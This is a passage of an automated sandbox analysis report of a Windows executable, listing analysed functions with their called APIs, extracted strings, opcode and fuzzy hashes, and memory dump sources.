                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File_wcscmp$Close$CurrentDirectoryFirstNext
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 4190467141-438819550
                                                                                                                                                          • Opcode ID: dc84b99a03629570e891c502887ca29c753e8e617762cc6d2e0b39c3d49c0988
                                                                                                                                                          • Instruction ID: 0aa995d2e827bcfa6e7e1d8d23d12c7c51a2945a5842702561c0b9c594bc1fcd
                                                                                                                                                          • Opcode Fuzzy Hash: dc84b99a03629570e891c502887ca29c753e8e617762cc6d2e0b39c3d49c0988
                                                                                                                                                          • Instruction Fuzzy Hash: 4831D431A016196ACF14EBA4EC48EDE77BCAF55320F108196F919E3191EB70DEC6CA64
                                                                                                                                                          Function 00126BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove_memset
                                                                                                                                                          • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                          • API String ID: 3555123492-286096704
                                                                                                                                                          • Opcode ID: 6ab0b4c3009342b2e08f9bcf28bfcfaf08953870db3d894d6862ba4d7f2a3cbe
                                                                                                                                                          • Instruction ID: f13f1b602c3b4733cab2c393a7206eb34ad2587274348b2cfc17f8686980c399
                                                                                                                                                          • Opcode Fuzzy Hash: 6ab0b4c3009342b2e08f9bcf28bfcfaf08953870db3d894d6862ba4d7f2a3cbe
                                                                                                                                                          • Instruction Fuzzy Hash: 5072DD75E00229DFDF29CF98C9806ADB7B1FF49314F2581A9D855AB380E334AE90DB50
                                                                                                                                                          Function 0018ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0018ED0C
                                                                                                                                                          • GetFocus.USER32 ref: 0018ED1C
                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0018ED27
                                                                                                                                                          • _memset.LIBCMT ref: 0018EE52
                                                                                                                                                          • GetMenuItemInfoW.USER32 ref: 0018EE7D
                                                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 0018EE9D
                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0018EEB0
                                                                                                                                                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0018EEE4
                                                                                                                                                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0018EF2C
                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0018EF64
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0018EF99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 3616455698-4108050209
                                                                                                                                                          • Opcode ID: e5a494644d86d4f68728bbe60f21dd6ea0be6ac81d7eace2a832fc48695754f0
                                                                                                                                                          • Instruction ID: 37611e5d891847e9ee7564cff5fa0313934c33b229857b36a914c3470c3f7dd1
                                                                                                                                                          • Opcode Fuzzy Hash: e5a494644d86d4f68728bbe60f21dd6ea0be6ac81d7eace2a832fc48695754f0
                                                                                                                                                          • Instruction Fuzzy Hash: 7C818C71608301AFD714EF14D884AABBBE5FF89354F04092DFA99972A1D730DA45CFA2
                                                                                                                                                          Function 0015B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0015B903
                                                                                                                                                            • Part of subcall function 0015B8E7: GetLastError.KERNEL32(?,0015B3CB,?,?,?), ref: 0015B90D
                                                                                                                                                            • Part of subcall function 0015B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0015B3CB,?,?,?), ref: 0015B91C
                                                                                                                                                            • Part of subcall function 0015B8E7: RtlAllocateHeap.NTDLL(00000000,?,0015B3CB), ref: 0015B923
                                                                                                                                                            • Part of subcall function 0015B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0015B93A
                                                                                                                                                            • Part of subcall function 0015B982: GetProcessHeap.KERNEL32(00000008,0015B3E1,00000000,00000000,?,0015B3E1,?), ref: 0015B98E
                                                                                                                                                            • Part of subcall function 0015B982: RtlAllocateHeap.NTDLL(00000000,?,0015B3E1), ref: 0015B995
                                                                                                                                                            • Part of subcall function 0015B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0015B3E1,?), ref: 0015B9A6
                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0015B3FC
                                                                                                                                                          • _memset.LIBCMT ref: 0015B411
                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0015B430
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B441
                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0015B47E
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0015B49A
                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 0015B4B7
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0015B4C6
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0015B4CD
                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0015B4EE
                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 0015B4F5
                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0015B526
                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0015B54C
                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0015B560
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2347767575-0
                                                                                                                                                          • Opcode ID: c5c796e0249695d05e7ab5845ff949f7583054bbf16138e3b35c384e956ca24e
                                                                                                                                                          • Instruction ID: 80c4cbb64fa22fe0a5c740b6c6640a70774226608e76c02f07d9ab0dc5fbecde
                                                                                                                                                          • Opcode Fuzzy Hash: c5c796e0249695d05e7ab5845ff949f7583054bbf16138e3b35c384e956ca24e
                                                                                                                                                          • Instruction Fuzzy Hash: 77514D71900209EFDF14DFA4EC85AEEBB79FF05301F048119F926AB691E7359A49CB60
                                                                                                                                                          Function 00166B3F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                            • Part of subcall function 00167B9F: __wsplitpath.LIBCMT ref: 00167BBC
                                                                                                                                                            • Part of subcall function 00167B9F: __wsplitpath.LIBCMT ref: 00167BCF
                                                                                                                                                            • Part of subcall function 00167C0C: GetFileAttributesW.KERNEL32(?,00166A7B), ref: 00167C0D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166B9D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166BBB
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00166BE2
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00166BF8
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00166C57
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166C6A
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166C7D
                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00166CAB
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00166D37
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00166D53
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00166D61
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find_wcscat$File__wsplitpath$Close$AttributesFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                          • String ID: \*.*
                                                                                                                                                          • API String ID: 481317943-1173974218
                                                                                                                                                          • Opcode ID: af285b04bdf1df7e3ddb779142bdee230dea7c524f3b4cd2d08e576f060a04fe
                                                                                                                                                          • Instruction ID: 0a5c452cf4823b30faa4133b919baf855b6379dcf2167077ecbd092b5208093f
                                                                                                                                                          • Opcode Fuzzy Hash: af285b04bdf1df7e3ddb779142bdee230dea7c524f3b4cd2d08e576f060a04fe
                                                                                                                                                          • Instruction Fuzzy Hash: 8B515F7290016CAADF21EBA0DC84EEE777CAF19304F0445D6E54AE3451EB319B98CF61
                                                                                                                                                          Function 00125D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                          • API String ID: 0-2893523900
                                                                                                                                                          • Opcode ID: 8a2641bd09c2d7a231079ac592950c26ac338ade03c01bb54c2ee5f788bf68a7
                                                                                                                                                          • Instruction ID: baae77a6fa6f19b2fcaeaa12b8aa8290393a37b5012dbc496b639e20e7d3214f
                                                                                                                                                          • Opcode Fuzzy Hash: 8a2641bd09c2d7a231079ac592950c26ac338ade03c01bb54c2ee5f788bf68a7
                                                                                                                                                          • Instruction Fuzzy Hash: 7B62A175E00229CBDF28CF98D8817AEB7B5BF59310F25816AE815EB2C1D7749E50CB90
                                                                                                                                                          Function 00166E4A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001231DA
                                                                                                                                                            • Part of subcall function 00167C0C: GetFileAttributesW.KERNEL32(?,00166A7B), ref: 00167C0D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166E7E
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00166E99
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00166EAE
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00166EDD
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166EEF
                                                                                                                                                          • _wcscat.LIBCMT ref: 00166F01
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00166F22
                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00166F3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind_wcscat$AttributesCloseFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                          • String ID: \*.*
                                                                                                                                                          • API String ID: 1343497842-1173974218
                                                                                                                                                          • Opcode ID: ce93a670b198f9e0f64a300affeef04e6fa26980643b0900cafb741ed17d6837
                                                                                                                                                          • Instruction ID: 5bbad998a054712a093d156ed9efd2a28f1635e10475d8fffc66010669aa9733
                                                                                                                                                          • Opcode Fuzzy Hash: ce93a670b198f9e0f64a300affeef04e6fa26980643b0900cafb741ed17d6837
                                                                                                                                                          • Instruction Fuzzy Hash: E321C1B2408344BAC610EBA0DC849DBBBDCAF69214F044E5EF5E5C3052EB30D65D87A2
                                                                                                                                                          Function 00177294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1737998785-0
                                                                                                                                                          • Opcode ID: f366db82355d1ea1b52bf188df9da64ca3ae13be99ce8330ccfa8b1f8634ed1f
                                                                                                                                                          • Instruction ID: 17038cce53aca18b7f2bb25053575fd5c9571daaab4a8a77288827d8e0c30c81
                                                                                                                                                          • Opcode Fuzzy Hash: f366db82355d1ea1b52bf188df9da64ca3ae13be99ce8330ccfa8b1f8634ed1f
                                                                                                                                                          • Instruction Fuzzy Hash: 9321AE31604610AFDB00AF65EC59B6DBBB8FF55720F00801AF90E9B6A1DB34ED80DB91
                                                                                                                                                          Function 001724A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001724F6
                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00172526
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0017253A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 00172555
                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001725F3
                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00172609
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 713712311-438819550
                                                                                                                                                          • Opcode ID: 597bf002918c3c6da8465f941c32cbe5611d40870497d7f468e0761ec302a6d7
                                                                                                                                                          • Instruction ID: fae6213879ebb2e4349838ab5f05cb6d50db0f712119304ed30f5c1cc2513900
                                                                                                                                                          • Opcode Fuzzy Hash: 597bf002918c3c6da8465f941c32cbe5611d40870497d7f468e0761ec302a6d7
                                                                                                                                                          • Instruction Fuzzy Hash: 2E417A7190021AAFCF14DFA4DC49AEEBBB4FF19310F108456F819A7190EB349A95CFA0
                                                                                                                                                          Function 00128530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
